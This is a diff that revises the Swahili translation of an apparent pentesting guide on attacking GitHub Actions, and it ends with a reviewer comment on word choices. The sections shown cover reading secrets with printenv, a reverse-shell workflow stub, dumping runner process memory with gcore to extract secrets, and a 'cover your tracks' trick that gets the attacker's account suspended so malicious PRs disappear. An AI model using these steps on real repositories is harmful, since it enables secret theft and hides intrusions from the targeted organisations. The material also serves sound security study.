@@ -392,7 +392,7 @@ Angalia kurasa zifuatazo:
|
||||
|
||||
### Kufikia siri <a href="#accessing-secrets" id="accessing-secrets"></a>
|
||||
|
||||
Ikiwa unachanganya maudhui kwenye script, ni muhimu kujua jinsi unavyoweza kufikia siri:
|
||||
Ikiwa unachoma maudhui kwenye script, ni muhimu kujua jinsi ya kufikia siri:
|
||||
|
||||
- Ikiwa siri au token imewekwa kwenye **kigezo cha mazingira**, inaweza kufikiwa moja kwa moja kupitia mazingira kwa kutumia **`printenv`**.
|
||||
|
||||
@@ -425,7 +425,7 @@ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Pata shell ya kinyume na siri</summary>
|
||||
<summary>Pata shell ya kurudi na siri</summary>
|
||||
```yaml
|
||||
name: revshell
|
||||
on:
|
||||
@@ -466,7 +466,7 @@ key: ${{ secrets.PUBLISH_KEY }}
|
||||
|
||||
### Kutumia Runners za Kujihudumia
|
||||
|
||||
Njia ya kupata ni zipi **Github Actions zinafanywa katika miundombinu isiyo ya github** ni kutafuta **`runs-on: self-hosted`** katika usanidi wa yaml wa Github Action.
|
||||
Njia ya kutafuta ni zipi **Github Actions zinazotekelezwa katika miundombinu isiyo ya github** ni kutafuta **`runs-on: self-hosted`** katika usanidi wa yaml wa Github Action.
|
||||
|
||||
**Runners za kujihudumia** zinaweza kuwa na ufikiaji wa **habari nyeti zaidi**, kwa mifumo mingine ya **mtandao** (nukta dhaifu katika mtandao? huduma ya metadata?) au, hata kama imejitengea na kuharibiwa, **hatua zaidi ya moja zinaweza kufanywa kwa wakati mmoja** na ile mbaya inaweza **kuiba siri** za nyingine.
|
||||
|
||||
@@ -475,12 +475,12 @@ Katika runners za kujihudumia pia inawezekana kupata **siri kutoka kwa \_Runner.
|
||||
sudo apt-get install -y gdb
|
||||
sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
|
||||
```
|
||||
Check [**hii posti kwa maelezo zaidi**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
|
||||
Angalia [**post hii kwa maelezo zaidi**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
|
||||
|
||||
### Github Docker Images Registry
|
||||
|
||||
Inawezekana kuunda Github actions ambazo **zitajenga na kuhifadhi picha ya Docker ndani ya Github**.\
|
||||
Mfano unaweza kupatikana katika ifuatayo inayoweza kupanuliwa:
|
||||
Mfano unaweza kupatikana katika yafuatayo yanayoweza kupanuliwa:
|
||||
|
||||
<details>
|
||||
|
||||
@@ -515,35 +515,35 @@ ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ e
|
||||
```
|
||||
</details>
|
||||
|
||||
Kama unavyoona katika msimbo uliopita, usajili wa Github unahifadhiwa katika **`ghcr.io`**.
|
||||
Kama unavyoona katika msimbo wa awali, usajili wa Github unahifadhiwa katika **`ghcr.io`**.
|
||||
|
||||
Mtumiaji mwenye ruhusa za kusoma juu ya repo basi ataweza kupakua Picha ya Docker akitumia tokeni ya ufikiaji wa kibinafsi:
|
||||
Mtumiaji mwenye ruhusa za kusoma juu ya repo ataweza kupakua Picha ya Docker kwa kutumia tokeni ya ufikiaji wa kibinafsi:
|
||||
```bash
|
||||
echo $gh_token | docker login ghcr.io -u <username> --password-stdin
|
||||
docker pull ghcr.io/<org-name>/<repo_name>:<tag>
|
||||
```
|
||||
Then, the user could search for **leaked secrets in the Docker image layers:**
|
||||
Kisha, mtumiaji anaweza kutafuta **siri zilizovuja katika tabaka za picha za Docker:**
|
||||
|
||||
{{#ref}}
|
||||
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
|
||||
{{#endref}}
|
||||
|
||||
### Sensitive info in Github Actions logs
|
||||
### Taarifa nyeti katika kumbukumbu za Github Actions
|
||||
|
||||
Hata kama **Github** inajaribu **kubaini thamani za siri** katika rekodi za hatua na **kuepuka kuonyesha** hizo, **data nyeti nyingine** ambazo zinaweza kuwa zimeundwa katika utekelezaji wa hatua hiyo hazitafichwa. Kwa mfano, JWT iliyosainiwa kwa thamani ya siri haitafichwa isipokuwa [imewekwa maalum](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
|
||||
Hata kama **Github** inajaribu **kubaini thamani za siri** katika kumbukumbu za hatua na **kuepuka kuonyesha** hizo, **data nyeti nyingine** ambazo zinaweza kuwa zimeundwa katika utekelezaji wa hatua hiyo hazitafichwa. Kwa mfano, JWT iliyosainiwa kwa thamani ya siri haitafichwa isipokuwa [imewekwa maalum](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
|
||||
|
||||
## Covering your Tracks
|
||||
## Kufunika Nyayo Zako
|
||||
|
||||
(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Kwanza kabisa, PR yoyote iliyoinuliwa inaonekana wazi kwa umma katika Github na kwa akaunti ya lengo ya GitHub. Katika GitHub kwa kawaida, **hatuwezi kufuta PR ya mtandao**, lakini kuna mabadiliko. Kwa akaunti za Github ambazo zime **simamishwa** na Github, **PR zao zote zinafuta moja kwa moja** na kuondolewa kutoka mtandao. Hivyo ili kuficha shughuli zako unahitaji ama kupata **akaunti yako ya GitHub isimamishwe au kupata akaunti yako iwe na alama**. Hii it **ficha shughuli zako zote** kwenye GitHub kutoka mtandao (kimsingi kuondoa PR zako zote za unyakuzi)
|
||||
(Teknolojia kutoka [**hapa**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Kwanza kabisa, PR yoyote iliyoinuliwa inaonekana wazi kwa umma katika Github na kwa akaunti ya lengo ya GitHub. Katika GitHub kwa kawaida, **hatuwezi kufuta PR ya mtandao**, lakini kuna mabadiliko. Kwa akaunti za Github ambazo zime **simamishwa** na Github, PR zao zote **zinafuta moja kwa moja** na kuondolewa kutoka mtandao. Hivyo ili kuficha shughuli zako unahitaji ama kupata **akaunti yako ya GitHub isimamishwe au kupata akaunti yako iwe na alama**. Hii itaficha **shughuli zako zote** kwenye GitHub kutoka mtandao (kimsingi kuondoa PR zako zote za unyanyasaji)
|
||||
|
||||
Shirika katika GitHub lina ufanisi mkubwa katika kuripoti akaunti kwa GitHub. Unachohitaji kufanya ni kushiriki "mambo fulani" katika Issue na watakikisha akaunti yako imesimamishwa ndani ya masaa 12 :p na hapo umepata, umefanya unyakuzi wako usionekane kwenye github.
|
||||
Shirika katika GitHub lina ufanisi mkubwa katika kuripoti akaunti kwa GitHub. Unachohitaji kufanya ni kushiriki "mambo fulani" katika Issue na watakikisha akaunti yako imesimamishwa ndani ya masaa 12 :p na hapo umepata, umefanya unyanyasaji wako usionekane kwenye github.
|
||||
|
||||
> [!WARNING]
|
||||
> Njia pekee kwa shirika kugundua kuwa wamekuwa wakilengwa ni kuangalia rekodi za GitHub kutoka SIEM kwani kutoka UI ya GitHub PR itakuwa imeondolewa.
|
||||
> Njia pekee kwa shirika kugundua kuwa wamekuwa wakilengwa ni kuangalia kumbukumbu za GitHub kutoka SIEM kwani kutoka kwa UI ya GitHub PR itakuwa imeondolewa.
|
||||
|
||||
## Tools
|
||||
## Zana
|
||||
|
||||
Zana zifuatazo ni muhimu kupata Github Action workflows na hata kupata zile zenye udhaifu:
|
||||
Zana zifuatazo ni muhimu kutafuta michakato ya Github Action na hata kupata zile zenye udhaifu:
|
||||
|
||||
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
|
||||
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
|
||||
|
||||
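Review bot: in the "Kufunika Nyayo Zako" paragraph, "(Technique from [**here**]" is replaced by "(Teknolojia kutoka [**hapa**]"; "teknolojia" is technology, not technique, so "Mbinu kutoka" would be the closer rendering and matches "mbinu" used elsewhere on the page. In the Tools section the added line translates "workflows" as "michakato" where the replaced line kept "workflows"; that runs against the "workflow" convention adopted in the @@ -174 and @@ -196 hunks.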